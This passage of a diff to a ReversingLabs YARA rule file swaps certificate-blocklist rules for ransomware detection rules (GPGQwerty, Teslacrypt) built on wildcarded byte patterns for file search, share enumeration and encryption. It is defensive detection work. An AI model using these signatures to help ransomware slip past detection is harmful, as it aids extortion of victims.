+            ?? ?? ?? ?? ?? 6A ?? 6A ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 89 44 24 ??
+            FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? FF D7 50 FF D6
+        }
+		$encrypt_files_p3 = {
+            6A ?? 6A ?? 66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ?? 6A ??
+            8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? C6 44
+            24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 80 7C 24 ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 83 C6 ??
+            56 FF 15 ?? ?? ?? ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            8B 75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? FF 15
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THREE D CORPORATION PTY LTD" and ( pe.signatures [ i ] . serial == "00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" or pe.signatures [ i ] . serial == "d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" ) and 1597622400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_shares_p* ) ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gpgqwerty : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GPGQwerty ransomware."
 		author = "ReversingLabs"
-		id = "52b11933-f22c-53ea-88b7-75b3242907dd"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8848e00a-a695-575b-a29d-fc9521859e12"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5674-L5690"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a8cec0479bfd53f34e291d56538187c05375e80d20af7f0af08f0db8e1d6ed22"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.GPGQwerty.yara#L1-L83"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e59adadd66b4d242ac7337ce4b3c3ec6c60724f4cf5b86305f1e31b88745928c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GPGQwerty"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tramplink LLC" and pe.signatures [ i ] . serial == "5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" and 1600781989 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_E5Ad42C509A7C24605530D35832C091E : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "29b1803e-90ee-5390-9548-20b24a3de218"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5692-L5710"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2d57d1c171734d0da167ce7eba47aecd88cd15063488d79659804c6c2fae00a2"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC
+            ?? 83 F8 ?? 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ?? 31 C0 EB ?? 0F B7 43 ?? 83 C0 ??
+            66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44 04 ?? 84 C0 88 01 75 ?? 8B 44 24
+            ?? 24 ?? 83 F8 ?? 76 ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 66 90
+            89 43 ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 E8 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ?? 83 F8
+            ?? 89 03 74 ?? E8 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ??
+            E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ??
+            ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? 90 56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04
+            24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ??
+            31 C0 EB ?? 0F B7 43 ?? 83 C0 ?? 66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44
+            04 ?? 84 C0 88 01 75 ?? 8B 44 24 ?? 24 ?? 83 F8 ?? 77 ?? 89 43 ?? 81 C4 ?? ?? ?? ??
+            89 F0 5B 5E C3 8D B4 26 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B
+            5E C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 81 C4 ?? ?? ??
+            ?? 89 F0 5B 5E C3
+        }
+		$find_files_p2 = {
+            8B 45 ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 95 C0 84
+            C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85
+            C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 83
+            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45
+            ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E8
+        }
+		$encrypt_files = {
+            C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83
+            C0 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44
+            24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ??
+            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 C2 B8
+            ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8D 85 ?? ?? ?? ?? 01 D0 66 C7 00 ?? ??
+            8B 45 ?? 83 E8 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VESNA, OOO" and ( pe.signatures [ i ] . serial == "00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" or pe.signatures [ i ] . serial == "e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" ) and 1600786458 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_8E3D89C682F7C0Dad70110Cb7B7C8263 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Teslacrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Teslacrypt ransomware."
 		author = "ReversingLabs"
-		id = "1adc776c-1549-5149-bd2f-81920a8d7255"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "842dae76-573c-564d-b658-ccdda451df21"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5712-L5730"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a0f42c5492469e7f132b000aead2d674fed4ea9c0e168579fd55a6c89b45ae4d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Teslacrypt.yara#L1-L665"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cc054be68d833d9f29a4ebd1c202922881b0d22a2605edc7def1048dc08f6325"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 65
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Teslacrypt"
 		importance = 25
 
+	strings:
+		$file_search_0_3_1_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B5 01 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? 0F 85 89 01 00 00 F6 44 24 ?? ?? 0F 84 D2 00 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
+            1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84
+            29 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83
+            C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 EA 00 00 00 56 8D 94 24 ?? ?? ?? ?? 68
+        }
+		$file_search_0_3_1_2 = {
+            52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 7E FE FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ??
+            50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ??
+            85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB
+            11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ??
+            0F 84 6A FE FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$file_search_0_3_3_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 57 02 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? 0F 85 2B 02 00 00 F6 44 24 ?? ?? 0F 84 74 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
+            1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84
+            CB 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83
+            C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 8C 01 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            52 E8 ?? ?? ?? ?? 8B C6 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
+        }
+		$file_search_0_3_3_2 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51
+            ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E8 00 00 00 8D 8C 24 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB
+            05 1B C0 83 D8 ?? 85 C0 0F 84 A9 00 00 00 8D 84 24 ?? ?? ?? ?? 57 50 E8 DC FD FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44
+            24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ??
+            ?? EB 11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ??
+            ?? ?? 0F 84 C8 FD FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$file_search_0_3_4a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 57 50 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 57 51 66 89 BC
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F
+            84 99 02 00 00 8B BC 24 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 76 02 00 00 F6 44 24 ?? ?? 0F 84 6B
+            01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 02 00 00 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 1E 02 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D
+            94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            0F 84 AF 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 92 01 00 00 8D 94 24 ?? ??
+            ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 75 01 00 00 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8
+        }
+		$file_search_0_3_4a_2 = {
+            83 C4 ?? 85 C0 0F 84 58 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3B 01
+            00 00 8D 94 24 ?? ?? ?? ?? 57 52 E8 10 FE FF FF 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? E9 E7 00 00 00 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 79 8D 54
+            24 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 7F 00 00 00 8D 44 24 ?? 50 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 63 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 47 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 35 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB 23 8D
+            4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 10 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24
+            ?? 50 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ?? 0F 84 7D FD FF FF 55 FF 15 ?? ?? ?? ?? 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D
+            33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$file_search_0_3_5a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A
+            ?? 51 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ??
+            52 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 0F 84 91 03 00 00 8B 9C 24 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 84 73 02 00 00 8D 4C
+            24 ?? B8 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2
+            75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 23 03 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 1E
+            66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E3
+            02 00 00 55 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C5 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85
+            C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54
